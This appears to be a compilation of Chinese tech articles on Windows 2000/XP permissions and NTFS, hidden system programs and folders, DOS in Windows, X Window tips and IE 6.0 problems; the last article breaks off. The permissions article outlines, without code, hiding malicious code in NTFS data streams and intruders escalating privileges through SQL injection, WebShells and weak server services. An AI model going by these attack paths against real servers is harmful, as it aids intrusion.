    Win2000/XP系统是微软Windows NT技术的产物，是基于服务器安全环境思想来构建的纯32位系统。NT技术没有辜负微软的开发，它稳定，安全，提供了比较完善的多用户环境，最重要的是，它实现了系统权限的指派，从而杜绝了由Win9x时代带来的不安全操作习惯可能引发的大部分严重后果。

    二. 权限的指派

    1.普通权限

    虽然Win2000/XP等系统提供了“权限”的功能，但是这样就又带来一个新问题:权限如何分配才是合理的?如果所有人拥有的权限都一样，那么就等于所有人都没有权限的限制，那和使用Win9x有什么区别?幸好，系统默认就为我们设置好了“权限组”(Group)，只需把用户加进相应的组即可拥有由这个组赋予的操作权限，这种做法就称为权限的指派。

    默认情况下，系统为用户分了6个组，并给每个组赋予不同的操作权限，依次为:管理员组(Administrators)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制组(Replicator)、来宾用户组(Guests)，其中备份操作组和文件复制组为维护系统而设置，平时不会被使用。(图.默认分组)

    系统默认的分组是依照一定的管理凭据指派权限的，而不是胡乱产生，管理员组拥有大部分的计算机操作权限(并不是全部)，能够随意修改删除所有文件和修改系统设置。再往下就是高权限用户组，这一部分用户也能做大部分事情，但是不能修改系统设置，不能运行一些涉及系统管理的程序。普通用户组则被系统拴在了自己的地盘里，不能处理其他用户的文件和运行涉及管理的程序等。来宾用户组的文件操作权限和普通用户组一样，但是无法执行更多的程序。(图.不同账户权限的限制)

    这是系统给各个组指派的权限说明，细心的用户也许会发现，为什么里面描述的“不能处理其他用户的文件”这一条规则并不成立呢，我可以访问所有文件啊，只是不能对系统设置作出修改而已，难道是权限设定自身存在问题?实际上，NT技术的一部分功能必须依赖于特有的“NTFS”(NT文件系统)分区才能实现，文件操作的权限指派就是最敏感的一部分，而大部分家庭用户的分区为FAT32格式，它并不支持NT技术的安全功能，因此在这样的文件系统分区上，连来宾用户都能随意浏览修改系统管理员建立的文件(限制写入操作的共享访问除外)，但这并不代表系统权限不起作用，我们只要把分区改为NTFS即可。

    2.特殊权限

    除了上面提到的6个默认权限分组，系统还存在一些特殊权限成员，这些成员是为了特殊用途而设置，分别是:SYSTEM(系统)、Everyone(所有人)、CREATOR OWNER(创建者)等，这些特殊成员不被任何内置用户组吸纳，属于完全独立出来的账户。(图.特殊权限成员)

    前面我提到管理员分组的权限时并没有用“全部”来形容，秘密就在此，不要相信系统描述的“有不受限制的完全访问权”，它不会傻到把自己完全交给人类，管理员分组同样受到一定的限制，只是没那么明显罢了，真正拥有“完全访问权”的只有一个成员:SYSTEM。这个成员是系统产生的，真正拥有整台计算机管理权限的账户，一般的操作是无法获取与它等价的权限的。

    “所有人”权限与普通用户组权限差不多，它的存在是为了让用户能访问被标记为“公有”的文件，这也是一些程序正常运行需要的访问权限——任何人都能正常访问被赋予“Everyone”权限的文件，包括来宾组成员。

    被标记为“创建者”权限的文件只有建立文件的那个用户才能访问，做到了一定程度的隐私保护。

    但是，所有的文件访问权限均可以被管理员组用户和SYSTEM成员忽略，除非用户使用了NTFS加密。

    无论是普通权限还是特殊权限，它们都可以“叠加”使用，“叠加”就是指多个权限共同使用，例如一个账户原本属于Users组，而后我们把他加入Administrators组，那么现在这个账户便同时拥有两个权限身份，而不是用管理员权限去覆盖原来身份。权限叠加并不是没有意义的，在一些需要特定身份访问的场合，用户只有为自己设置了指定的身份才能访问，这个时候“叠加”的使用就能减轻一部分劳动量了。

·无形的栅栏 完全解析Windows系统权限（2）
    3.NTFS与权限

    在前面我提到了NTFS文件系统，自己安装过Win2000/XP的用户应该会注意到安装过程中出现的“转换分区格式为NTFS”的选择，那么什么是NTFS?NTFS(New Technology File System)是一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式，只有使用NT技术的系统对它直接提供支持，也就是说，如果系统崩溃了，用户将无法使用外面流行的普通光盘启动工具修复系统，因此，是使用传统的FAT32还是NTFS，一直是个倍受争议的话题，但如果用户要使用完全的系统权限功能，或者要安装作为服务器使用，建议最好还是使用NTFS分区格式。

    与FAT32分区相比，NTFS分区多了一个“安全”特性(图.FAT32与NTFS的比较)，在里面，用户可以进一步设置相关的文件访问权限，而且前面提到的相关用户组指派的文件权限也只有在NTFS格式分区上才能体现出来。例如，来宾组的用户再也不能随便访问到NTFS格式分区的任意一个文件了，这样可以减少系统遭受一般由网站服务器带来的入侵损失，因为IIS账户对系统的访问权限仅仅是来宾级别而已，如果入侵者不能提升权限，那么他这次的入侵可以算是白忙了。

    使用NTFS分区的时候，用户才会察觉到系统给管理员组用户设定的限制:一些文件即使是管理员也无法访问，因为它是SYSTEM成员建立的，并且设定了权限。(图.NTFS权限审核导致访问被拒绝)

    但是NTFS系统会带来一个众所周知的安全隐患:NTFS支持一种被称为“交换数据流”(AlternateDataStream，ADs)的存储特性，原意是为了和Macintosh的HFS文件系统兼容而设计的，使用这种技术可以在一个文件资源里写入相关数据(并不是写入文件中)，而且写进去的数据可以使用很简单的方法把它提取出来作为一个独立文件读取，甚至执行，这就给入侵者提供了一个可乘之机，例如在一个正常程序里插入包含恶意代码的数据流，在程序运行时把恶意代码提取出来执行，就完成了一次破坏行动。(图.隐秘的数据流)

    不过值得庆幸的是，数据流仅仅能存在于NTFS格式分区内，一旦存储介质改变为FAT32、CDFS等格式，数据流内容便会消失了，破坏代码也就不复存在。

    4.权限设置带来的安全访问和故障

    很多时候，管理员不得不为远程网络访问带来的危险因素而担忧，普通用户也经常因为新漏洞攻击或者IE浏览器安全漏洞下载的网页木马而疲于奔命，实际上合理使用NTFS格式分区和权限设置的组合，足以让我们抵御大部分病毒和黑客的入侵。

    首先，我们要尽量避免平时使用管理员账户登录系统，这样会让一些由IE带来的病毒木马因为得不到相关权限而感染失败，但是国内许多计算机用户并没有意识到这一点，或者说没有接触到相关概念，因而大部分系统都是以管理员账户运行的，这就给病毒传播提供了一个很好的环境。如果用户因为某些工作需要，必须以管理员身份操作系统，那么请降低IE的运行权限，有试验证明，IE运行的用户权限每降低一个级别，受漏洞感染的几率就相应下降一个级别，因为一些病毒在例如像Users组这样的权限级别里是无法对系统环境做出修改的。降低IE运行权限的方法很多，最简单的就是使用微软自家产品“Drop MyRights”对程序的运行权限做出调整。(图.用RunAs功能降低IE运行级别)

    对管理员来说，设置服务器的访问权限才是他们关心的重点，这时候就必须搭配NTFS分区来设置IIS了，因为只有NTFS才具备文件访问权限的特性。然后就是安装IIS，经过这一步系统会建立两个用于IIS进程的来宾组账户“IUSR_机器名”和“IWAM_机器名”，但这样还不够，别忘记系统的特殊成员“Everyone”，这个成员的存在虽然是为了方便用户访问的，但是对于网络服务器最重要的“最小权限”思路(网络服务程序运行的权限越小，安全系数越高)来说，它成了安全隐患，“Everyone”使得整个服务器的文件可以随便被访问，一旦被入侵，黑客就有了提升权限的机会，因此需要把惹祸的“Everyone”成员从敏感文件夹的访问权限去掉，要做到这一步，只需运行“cacls.exe 目录名 /R "everyone" /E”即可。敏感文件夹包括整个系统盘、系统目录、用户主目录等。这是专为服务器安全设置的，不推荐一般用户依葫芦画瓢，因为这样设定过“最小权限”后，可能会对日常使用的一些程序造成影响。

    虽然权限设定会给安全防范带来一定的好处，但是有时候，它也会闯祸的…… “文件共享”(Sharing)是被使用最多的网络远程文件访问功能，却也是最容易出问题的一部分，许多用户在使用一些优化工具后，发现文件共享功能突然就失效了，或者无论如何都无法成功共享文件，这也是很多网络管理员要面对的棘手问题，如果你也不巧遇到了，那么可以尝试检查以下几种原因:

    (1).相应的服务被禁止。文件共享功能依赖于这4个服务:Computer Browser、TCP/IP NetBIOS Helper Service、Server、Workstation，如果它们的其中一个被禁止了，文件共享功能就会出现各种古怪问题如不能通过计算机名访问等，甚至完全不能访问。

    (2).内置来宾账户组成员Guest未启用。文件共享功能需要使用Guest权限访问网络资源。

    (3). 内置来宾账户组成员Guest被禁止从网络访问。这问题常见于XP系统，因为它在组策略(gpedit.msc)->计算机配置->Windows设置->安全设置->本地策略->用户权利指派->拒绝从网络访问这台计算机里把Guest账户添加进去了，删除掉即可真正启用Guest远程访问权限。

    (4).限制了匿名访问的权限。默认情况下，组策略(gpedit.msc)->计算机配置->Windows设置->安全设置->本地策略->安全选项->对匿名连结的额外限制的设置应该是“无。依赖于默认许可权限”或者“不允许枚举SAM账号和共享”，如果有工具自作聪明帮你把它设置为“没有显式匿名权限就无法访问”，那么我可以很负责的告诉你，你的共享全完蛋了。

    (5).系统权限指派出现意外。默认情况下，系统会给共享目录指派一个“Everyone”账户访问授权，然而实际上它还是要使用Guest成员完成访问的工作，但是有时候，Everyone却忘记Guest的存在了，这是或我们就需要自己给共享目录手动添加一个Guest账户，才能完成远程访问。(图.手动添加一个账户权限)

    (6).NTFS权限限制。一些刚接触NTFS的用户或者新手管理员经常会出这个差错，在排除以上所有问题的前提下依然无法实现文件共享，哪里都碰过了就是偏偏不知道来看看这个目录的“安全”选项卡，并在里面设置好Everyone的相应权限和添加一个Guest权限进去，如果它们会说话，也许早就在音箱里叫唤了:嘿，快看这里!哟嗬!

    (7).系统自身设置问题。如果检查了以上所有方法都无效，那么可以考虑重装一个系统了，不要笑，一些用户的确碰到过这种问题，重装后什么也没动，却一切都好了。这大概是因为某些系统文件被新安装的工具替换掉后缺失了文件共享的功能。

    由权限带来的好处是显而易见的，但是我们有时候也不得不面对它给我们带来的麻烦，没办法，谁叫事物都是有两面性的呢，毕竟正是因为有了这一圈栅栏，用户安全才有了保障。

    三. 突破系统权限

    距离上一次狼群的袭击已经过了一个多月，羊们渐渐都忘记了恐惧，一天晚上，一只羊看准了某处因为下雨被泡得有点松软低陷的栅栏，跳了出去。可惜这只羊刚跳出去不久就遭遇了饿狼，不仅尸骨无存，还给狼群带来了一个信息:栅栏存在弱点，可以突破!

    几天后的一个深夜，狼群专找地面泥泞处的栅栏下手，把栅栏挖松了钻进去，再次洗劫了羊群。

    虽然权限为我们做了不同范围的束缚，但是这些束缚并不是各自独立的，它们全都依靠于同样的指令完成工作，这就给入侵者提供了“提升权限”(Adjust Token Privilege)的基础。

    所谓“提升权限”，就是指入侵者使用各种系统漏洞和手段，让自己像那只羊或者狼群那样，找到“栅栏”的薄弱环节，突破系统指派的权限级别，从而把自己当前的权限提高多个级别甚至管理员级别的方法，提升权限得以成功的前提是管理员设置的失误(例如没有按照“最小权限”思路来配置服务器)或者业界出现了新的溢出漏洞等(例如LSASS溢出，直接拿到SYSTEM权限)。

    通常，如果IIS或SQL两者之一出现了漏洞或设置失误，入侵者会尝试直接调用SQL注入语句调用特殊的系统存储过程达到直接执行命令的愿望，如果这一步成功，那么这台服务器就沦陷了;但如果管理员还有点本事，删除了存储过程或者补好了SQL注入点呢?入侵者会想办法得到IIS的浏览权限，例如一个WebShell之类的，然后搜寻整台服务器的薄弱环节(前提:管理员没删除Everyone账户权限)，例如Serv-U、IIS特殊目录、各种外部CGI程序、FSO特殊对象等，这场猫和耗子的游戏永远也不会结束，如果管理员功底不够扎实，那么只能看着入侵者破坏自己的劳动成果甚至饭碗了。

    四. 结语

    狼群的进攻再次被牧民们击退了，吸取了这次教训，牧民们在加固栅栏时都会把栅栏的根部打在坚硬的泥地上，并且嵌得很深。

    饿狼们，还会再来吗?

    权限是计算机安全技术的一个进步，但是它也是由人创造出来的，不可避免会存在不足和遗漏，我们在享受权限带来的便利时，也不能忽视了它可能引起的安全隐患或者设置失误导致的众多问题。要如何才算合理使用权限，大概，这只能是个仁者见仁，智者见智的问题了。

    今天，你又在用管理员账户心安理得的到处逛了吗?


Windows系统中鲜为人知的宝藏之程序篇

《一键清理系统垃圾》

Windows系统中鲜为人知的宝藏之程序篇

    在Windows操作系统中，一直隐藏着一些我们不知道的秘密，在本文中我们就将从文件夹、程序、启动、命令和进程等五个方面来说明一下Windows操作系统隐藏的秘密。上期我们讲了文件夹篇，本期我们讲述程序篇。

    Arp.exe TCP/IP地址解析工具。

    Asd.exe 自动跳过驱动程序 。利用该程序 可以检查系统在启动过程中的错误并能提供相应的解决方案。在系统出现严重问题时，可检测引发故障的原因，并能选择是否跳过其认为是"罪魁祸首"的驱动程序。

    Calc.exe 计算器。

    Cdplayer.exe Windows自带的CD播放器。

    Charmap.exe 字符映射表。如果想在"记事本"中输入类似"①"的 符号，利用字符映射表就可以方便解决。

    Cleanmgr.exe 磁盘清理程序。当你的磁盘空间不够时，用该程序可以帮助你快速地清除磁盘上的垃圾文件。

    Clipbrd.exe 剪贴板查看程序。如果剪贴板上的内容过大过多，则会占用大量的内存。利用该程序可以查看和删除剪贴板中的内容。 Clspack.exe Windows的打包软件。用此工具可以将文件进行压缩。

    Control.exe 调用[控制面板]程序。使用时不带参数可起动[控制面板]，若利用命令行在其后跟上某个控制项目文件名(.cpl类型，在System目录中能找到)，将打开具体的控制项，如果再空一格并加上以逗号开头的数字代码，则可直接进入具体控制项的某一栏(控制项首栏数字代码是0)。

    例:在[运行]命令行输入Control desk.cpl ,3后，将调出[显示]属性/设置] 窗口。有了它，在编写自己的程序时，哪怕是最简单的批处理程序，都能轻松地打开[控制面板]完成系统设置的调整。这比起晦涩难懂的RunDll32.exe来，要容易得多。

    Cvtaplog.exe 磁盘碎片整理助手。

    Defrag.exe碎片整理程序。运行该程序可以消除选定分区中的磁盘碎片。

    Dialer.exe电话拨号程序。运行该程序可打开"电话拨号程序"窗口。

    Directcc.exe直接电缆连接程序。使用直接电缆连接，可以方便快捷地在两台计算机之间直接利用串口和并口连接。

    Drvspace.exe磁盘空间管理程序。运行该程序可对磁盘进行压缩和解压缩操作。

    Drwatson.exe 华生医生(Dr.Watson)，每当发生系统错误时能对系统拍取快照进行诊断，并可截获软件错误和提供详细的错误原因说明，还可就诊断的问题提出操作建议。这是 Win98自带的系统诊断程序，设计该程序的初衷，主要是为了帮助微软技术人员，远程为你维护系统。运行它后，任务栏右下角出现了"医生"的图标(就是那个头带听诊器，装腔作势的"老外")，"狠击"它两下，立刻会跳出个忙碌的窗口，为你的"爱姬"检查身体。很快一张报告出来了，这便是当前时刻你的系统快照。其中包含有正在运行的任务、驱动程序、已加载的16位模块三类软件环境信息，实际上是[系统信息](Msinfo32.exe)所提供资料的简化版。它的优势在于方便迅速，并能存为日志文件(.wlg扩展名)，有利于前后对比查验系统存在的问题。

    DVDPLAY.EXE DVD播放程序

    DXDIAG.EXE DirectX 诊断工具程序。

    Emm386.exe 扩展内存管理程序。

    Explorer.exe 资源管理器。运行该程序将启动"资源管理器"。

    Extrac32.exe CAB文件包释放程序。用此文件，可以将CAB文件包中的文件释放出来。

    Fontview.exe 字体查看程序。利用该程序，可以查看指定的Windows中安装的字体文件。命令行中跟上字体文件名(FON或TTF类型)，可查看各种字体的样式范例。系统中所有字体文件的打开都是默认与它关联的。

    Freecell.exe 空当接龙游戏。

    Ftp.exe文件传输程序。

    Grpconv.exe 组文件转换工具。可把Win3X下的组文件(GRP扩展名)，转换成Win98[开始]菜单中[程序]项下的文件夹，各个组项目也改头换面，成了文件夹中的快捷方式。

    Hh.exe 帮助查看程序。

    Ieshwiz.exe 自定义文件夹向导。Win98中你可对每个文件夹都设置其特有的外观式样，编辑文件夹的背景图案、文字颜色等内容，丰富自己系统的个性特征。它与资源管理器[查看]菜单中的[自定义文件夹...]项是对应的。

    IMEGEN.EXE 具输入法生成器

    Internat.exe 输入法切换程序。该程序常驻内存，运行后会在任务栏右下角出现熟悉的输入法字样。

    Ipconfig.exe DOS环境下的TCP/IP配置程序。可以在DOS环境下查看和修改TCP/IP的配置情况。

    IsUninst.exe 卸载程序。执行该程序，可以安全卸载Windows中的程序和与其相关的组件。

    Kodakimg.exe Windows中的图像查看程序，运行该程序可以浏览多种格式的图形文件。

    Mem.exe DOS内存状况查看程序。运行此程序可以在MS-DOS窗口中查看当前运行的程序占用物理内存的情况。

    Mplayer.exe 媒体播放机。运行该程序可以打开媒体播放器对话框，播放VCD或AVI等程序。

    Mkcompat.exe 强制兼容程序。微软设计Win9X时，考虑最多的问题恐怕就是兼容性了，以至于宁可牺牲部分32位程序性能，也要保证对传统软件最大限度的兼容。现在想想，这个程序之所以没有被放在明处，也许是微软非常自信系统的兼容性，觉得此东西用不着了吧!该工具的用法是:当某个以前版本的Windows程序(主要是Win3X下的16位程序)无法运行或运行不稳定时，能提供众多可选项，用来调整其运行方式和运行环境，使之可正常使用，当然这是以放弃不少先进特性为代价的。

    MSCONFIG.EXE 系统启动配置程序。这是个非常有用的"好东东"，建议有基础的朋友为它在开始菜单中设个快捷方式。通过它，在Autoexec. bat、Config.sys、System.ini、Win.ini四个重要文件中，你可直接修改乃至创建新内容，而且对这些文件中的每一行，以及在注册表里注册为启动时运行的每一项，都能逐个选择是否禁止;该程序还为更高级用户准备了12个选项，可用于解决一些软、硬件兼容性问题。这个工具的另一大优点是，能方便地备份和还原启动配置，对被用户禁止的内容也不删除，只是加上特定标记暂且停用，以利于日后恢复，安全性很高。

    Mshearts.exe 网上红心大战游戏。

    msimn.exe　Outlook Express 程序。

作者：
来源：天极yesky


Windows系统中鲜为人知的宝藏之文件夹篇

《一键清理系统垃圾》

Windows系统中鲜为人知的宝藏之文件夹篇

    在Windows操作系统中，一直隐藏着一些我们不知道的秘密，在本文中我们就将从文件夹、程序、启动、命令和进程等五个方面来说明一下Windows操作系统隐藏的密码。本期我们先凌晨文件夹篇。

    All Users 这里记录的是Window的用户以及这些用户个人设定的开始菜单及桌面等信息。

    Command 在这个目录下有着许多的DOS的常用命令，例如debug，format 等。

    可别小看这些老廉颇呀，在许多关键时刻还得靠他们哟。

    Config 用于存放Windows中硬件配制文件。

    Cursors 这是存放Windows光标的目录。

    Desktop 除了"我的电脑"、"我的文档"这几个系统图标外其它由程序和文档建立的桌面快捷方式都会在这里面找到。如果在这里删除某个图标，相应的就会删除桌面上的图标。如果你在桌面上存放文件得话，实 际也就是存放在这个文件夹。

    Downloaded Program Files 该目录存放上网下载东东时的临时文件。

    Favorites 存放收藏夹的内容。

    Fonts 这是存放 Windows的字体文件的目录。要安装某种字体只需将字体文件直接复制到该目录下即可。

    Help 存放Windows帮助文件。

    History 默认状态时可以保留你近二十天来的IE操作记录。

    Media 这里存放着Windows系统的声音文件，像Windows启动结束时发出的微软招牌音乐Microsoft Sound等都存放于此。

    Offline Web Pages 这里存放着用于离线浏览的文件。

    Recent 这是对应开始菜单中文档菜单下的文档调用历史记录。 它会把你最近打开的文档和图片的路径记录下来，方便用户快速打开最近使用的文档。

    SendTo 这个目录对应的是对文件使用"发送到"命令时的"目的地"。 你可以在里面为常用的文件夹添加快捷方式，以后再复制文件时就不必抓着鼠标到处找了。

    Start Menu 对应Windows的开始菜单，可以直接在改目录对开始菜单进行管理。

    Start Menu/Programs　开始菜单的程序。

    Start Menu/Programs/启动 自动运行。

    INF INF驱动程序脚本文件夹。

    OTHER INF其它驱动程序脚本文件夹。

    Wallpaper 网页背景文件夹。

    SYSBCKUP 系统文件备份文件夹。

    System和System32 这是两个很重要的系统文件夹，存放Windows的系统文件和硬件驱动程序等重要信息。

    Tasks 这里对应的 Windows的计划任务，添加的任务都会在这里面找得到。

    Temp主要用于存放执行解压缩、安装程序等操作时产生的临时文件的目录。

    要注意清理，避免临时文件长期占用硬盘空间。

    Temporary Internet Files 也是存放临文件的目录，不同的是它存放的是浏览网页时产生的临时文件。它可以加快网页的浏览速度，但太多很占空间的，要定期清理。

    Web 这是存放一些与Web相关的东西。在资源管理器中按Web查看时浏览栏中的蓝天白云的图片，屏幕保护程序中的频道屏幕保护程序，以及IE浏览中找不到服务器时的Web页等都存放在这里。

    Application Data应用程序数据目录。

作者：
来源：天极yesky


Windows中的DOS

《一键清理系统垃圾》

Windows中的DOS

DOS已逐渐远去，我们每天都习惯地使用着Windows 98/Me/2000，可是你了解Windows中的DOS吗？
    今天，笔者就向朋友们详细介绍Windows中的DOS知识：
    Windows Me篇
    之所以要向朋友们介绍Windows Me，而不是Windows 98，这是因为Windows Me据说已抛弃了DOS，其实不然哟！
    1.进入MS-DOS方式
    虽然Windows Me已不再存在纯DOS，但你依然可以从“开始/程序/附件”中选择“MS-DOS方式”；如果想在全屏幕和窗口模式之间进行切换，仍旧使用“Alt+Enter”；退出时键入EXIT命令就行了。
    2.启动中文DOS方式
    还记得PDOS95.BAT这个批处理文件吗？Windows Me中仍旧保留着这个著名的文件，它的位置是在“Windows\Command”下，你可以通过它来启动Windows下的中文DOS方式（见^20020201a^1），就可以在MS-DOS方式下正常显示中文文件和键入汉字啦（当然，你不一定要从“开始/程序/附件/MS-DOS”下运行，也可以用软盘启动后直接在提示符下使用），按“Ctrl+F10”可以改变窗口的显示风格、输入、打印风格等，按“Ctrl+Shift”可以切换各种不同的中文输入法，退出时只要使用QUIT命令即可。
    下面笔者给出PDOS95.BAT批处理文件的内容，供朋友们参考：
    pbios：启动中文系统内核
    font16：16×16字体驱动程序
    hzvio95：DOS7.0中文版显示驱动程序
    hzkbd：通用词典输入法
    instdict pinyin：安装拼音输入法
    instdict shanpin：安装双拼输入法
    instdict quwei：安装区位输入法
    instdict guobiao：安装国标输入法
    ctrlpan：系统控制台程序
    Windows 2000篇
    1.如何进入MS-DOS方式？
    由于在 Windows 2000 中的“MS-DOS方式”已被更名为“命令提示符”，因此你必须从“开始/程序/附件”中单击“命令提示符”，才可以进入熟悉的DOS方式。如果你想在全屏幕和窗口之间进行切换，请按“Alt+Enter”键，但这一切换方式仅支持基于Intel芯片的计算机。
    如果你想退出命令提示符会话，只要在命令提示符窗口中光标处键入EXIT，或直接点击窗口右上角的“×”按钮。
    2.为MS-DOS程序创建PIF
    在创建MS-DOS程序的快捷方式或修改该程序属性的同时，也创建了程序信息文件（PIF）。PIF允许设置MS-DOS程序的默认属性，如字体大小、屏幕颜色和内存分配等。在基于MS-DOS 的程序中更改任何设置都会自动创建 PIF，每次通过双击图标来启动该程序时，都将使用指定的设置。在为基于MS-DOS的程序创建程序信息文件（PIF）的同时，也为可执行程序创建了快捷方式。保存在PIF文件中的所有设置都包含在快捷方式中，Windows 2000 将PIF文件显示为快捷方式。不过，如果你是从命令提示符窗口启动该程序，则不会使用这些设置。
    3.更改MS-DOS程序的高级属性
    找到基于MS-DOS程序的图标或快捷方式，从右键菜单中选择“属性”命令，可以看到如^20020201b^2所示的窗口，从这里你可以更改它的一些高级属性。朋友们可以看到这里有常规、程序、字体、内存、屏幕、其他等六个选项卡，笔者这里仅讲解比较重要的一些设置：
    （1）为基于MS-DOS的程序分配系统资源并更改空闲时间
    在“属性”中，单击“其他”选项卡，调整“空闲敏感度”滑块：如果你想为后台程序分配更多的资源，请将滑块向“低”移动；反之请将滑块向“高”移动。不过，为了使其他程序能够多使用资源，可以减少基于MS-DOS的程序的计算机资源分配，在此之前我们可以指定该程序保持空闲的时间。但该选项可能在某些基于MS-DOS 的程序中无法使用。
    （2）设置兼容的计时器硬件仿真
    单击图2中的“程序”选项卡，然后单击下方的“高级”按钮，可以看到“Windows PIF设置”对话框（如^20020201c^3），请选中“兼容计时器硬件仿真”复选框。兼容计时器硬件仿真启用基于MS-DOS的程序，用以降低计算机计时器发送计时信号的速率。绝大多数基于MS-DOS的程序在最初设计时都没考虑到使用高速处理器，如果基于MS-DOS的程序设置的速率太高，则可能无法运行。因此，请朋友们仔细审阅附加的程序文档之后，才能选中该复选框，否则反而可能降低程序性能或影响程序计算的能力，当然该选项在一些MS-DOS程序中可能是无效的。
    4.使用鼠标复制和粘贴MS-DOS文本
    打开命令提示符窗口，右键单击命令提示符窗口的标题栏（请注意是右击标题栏，而不是窗口中的空白处），然后单击“属性”。在“选项”选项卡的“编辑选项”下（如^20020201d^4），选中“快速编辑模式”复选框（如果它没有选中），然后单击“确定”。在“应用属性”对话框中（如^20020201e^5），单击以下项目中的任何一项：
    “只在当前窗口应用属性”可在当前窗口中使用“快速编辑”模式，“用相同标题为将来的窗口保存属性”可在每次启动基于MS-DOS的程序时应用“快速编辑”模式。
    单击“确定”按钮关闭对话框后，单击并将鼠标指针拖动过命令提示符窗口中需要复制的文本，将光标放在要插入文本的地方，然后执行下面的其中一项操作：
    在基于MS-DOS的程序中，用右键单击标题栏，单击“编辑”，然后单击“粘贴”。
    在基于Windows的程序中，单击“编辑”菜单，然后单击“粘贴”。或者用右键单击，然后单击“粘贴”。但要注意，“快速编辑”模式在所有基于MS-DOS的程序中都是不可用的；另外，当程序以全屏幕形式运行时，不能将文本粘贴到命令提示符窗口或基于MS-DOS的程序中。
    5.在 Windows 2000中更改程序信息文件（PIF）
    在创建或更改PIF之前，请查阅基于MS-DOS的程序文档，更改PIF会影响程序与 Windows 2000之间的互操作性。要指定基于MS-DOS的程序是以全屏幕的形式启动还是以窗口的形式启动，请更改“程序”（或“快捷方式”）选项卡上的“运行”属性；要快速查看基于MS-DOS 的程序在屏幕上的输出，请在“屏幕”选项卡上的“性能”下选择“快速ROM仿真”（当然要事先确定显卡支持快速ROM仿真）；要提高MS-DOS程序的性能，可以给它分配更多的内存，要进行此项更改，可以在“内存”选项卡上，将“扩充内存（EMS）”或“扩展内存（XMS）”项设置为“自动”，不要强加任何限制，如果程序出错，可将“总数”窗口值设置为8192。
    6.更改命令记录设置
    打开命令提示符窗口，用右键单击标题栏，然后单击“默认”，在“选项”选项卡的“命令记录”下，指定缓存大小，然后指定要使用的缓存数量。注意，更改缓存大小将更改缓存可存储的命令数，更改缓存的数量可同时更改具有独特历史记录缓存的进程数量。增加缓存的数量或大小将使用更多的内存。如果要消除命令记录中的重复命令，请选中“丢弃旧的备份”复选框。
    7.更改命令提示符显示选项设置
    打开命令提示符窗口，右键单击标题栏，然后单击“默认”，在“选项”选项卡的“显示选项”下，单击“窗口”或“全屏”显示。
    上面，笔者粗略举出了Windows系统中的DOS内容，希望能对朋友们有所帮助。


Xwindow使用技巧三则

《一键清理系统垃圾》

Xwindow使用技巧三则

    就桌面应用而言，Xwindow是Linux中极富魅力的部分，充分挖掘其潜能会给我们的应用带来许多益处。下面就以流行的TurboLinux中文版为例，介绍其中的几则使用技巧。
    1.快速启动Xwindow图形登录界面
    在超级用户命令提示符＃后键入init 5 指令。
    说明：Linux分为多个运行态（级别），默认的是3号多用户网络态，为字符界面；5号是Xwindow态，提供类xdm图形登录界面。init 5指令是将当前的运行态转到5号态，启动Xwindow图形登录界面。2.字符界面与Xwindow图形界面的快速切换字符界面到Xwindow界面的切换，可以按“Alt＋Ctrl＋F7”组合键；Xwindow界面到字符界面的切换，按“Alt＋Ctrl＋（F1～F6）”组合键（F1～F6为6个功能键的任意一个）。
    说明：Linux默认打开7个屏幕，编号为tty1～tty7。Xwindow启动后，占用的是tty7号屏幕，tty1～tty6仍为字符界面屏幕，用“Alt＋Ctrl＋Fn”组合键即可实现字符界面与Xwindow界面的快速切换。
    2.定制Xwindow视窗管理器桌面快捷菜单
    很多视窗管理器，如X自带的twm、Motif的mwm、仿Win9X界面的fvwm95等，都提供了桌面快捷菜单，其中的菜单项目控制都放在系统库目录下的rc文件里。如果你对其中的菜单项目不满意，可以进行定制。下面以Motif的mwm为例：
    （1）把系统rc文件复制到家目录：
    cp /usr/lib/X11/mwm/system.mwmrc　＄HOME/.mwmrc
    家目录下的.mwmrc文件的优先权要高于系统rc文件。
    （2）修改.mwmrc文件，进行定制。
     ＄ vi　.mwmrc
    增加调用图像处理程序gimp、计算器xcalc菜单项的格式为：
    ......在RootMenu章节添上：
    “新增图像处理gimp”　　 f.exec “gimp ＆”
    “新增计算器xcalc”　　　f.exec “xcalc ＆”
    ......
    （3）重新进入Motif。这时，如单击右键弹出桌面菜单，您就会发现菜单项目中多了gimp、xcalc。
    3.启动时自动执行Xwindow程序
    （1）找到家目录下的点文件“.xinitrc”；（2）修改“.xinitrc”，在最后一行命令上方，加入你想启动的X软件命令，并在命令行的尾部添一个后台运行符“＆”即可。
    以Motif为例，要在一进入Xwindow时自动调用英汉词典xdict，可以在“.xinitrc”中加入下面两行：
    ......
    xdict ＆　←在这里增加英汉词典xdict命令行
    /usr/X11R6/bin/mwm ←最后一行命令


摆脱IE 6.0的噩梦

《一键清理系统垃圾》

摆脱IE 6.0的噩梦

早在 WINDOWS XP 发布之前，IE 6.0就面世了，作为浏览器的升级版本，它既能安装在后来的 WINDOWS XP 操作系统上，也可安装于 WINDOWS 9X/ME/NT/2000 系统平台。但自从它发布以来，众多的安全问题与BUG也随之出现，"IE 6.0噩梦"之说也不径而走。下面我们就来了解一下这些问题，并提出一些相应的解决办法。我们不能保证这些办法一定能让你摆脱"IE 6.0的噩梦"，但至少，它是一种新的尝试。

      一、图像自适应的问题

      A．现象：
      网络上，特别是一些图库网站，常常在分类页面中放置若干缩略图片，点击后可以打开一个新页面并以全屏形式对该图进行展示。如果该图的高度或宽度超出了屏幕边界，以前版本的IE就会在底边或右边出现卷栏条，让用户可以使用鼠标拖动进行查看。

      相对于以前的版本，IE 6.0多了项默认的图片自适应功能，对于超过一屏的大幅图片，它会自动以一定的比例缩小该图并始终以一屏进行显示，而不会承袭原图的尺寸。随着图像尺寸的缩小，原图在某些地方会显得比较模糊，如果你恰恰需要一幅比较清晰的原图，那该怎么办呢？

      B．解决办法：
      要屏蔽 IE 6.0的图片自适应问题，可以通过清除 "工具/INTERNET 选项/高级/启用自动图像大小调整"复选框来完成；要重新启用该选项，只需再勾选此复选框就行了。

      二、左右为难的JAVA

      A．现象：
      常有朋友来信报怨，说以前用得好好的浏览器突然登录不上JAVA网站了，或者抱怨不能玩JAVA游戏了。仔细一问，几乎都是在进行IE升级后出现类似问题的。

      B．解决办法：
      不能正常运行JAVA程序的原因有很多，下面我们罗列出用户平时最可能遇到的问题并提出解决方案：

      1．JAVA虚拟机(JAVA VIRTUAL MACHINE，简称JVM)缺失：
      对于WINDOWS XP捆绑销售整机，或是全新安装 WINDOWS XP 操作系统的电脑，JVM缺失是导致JAVA程序运行出错的最可能的原因。

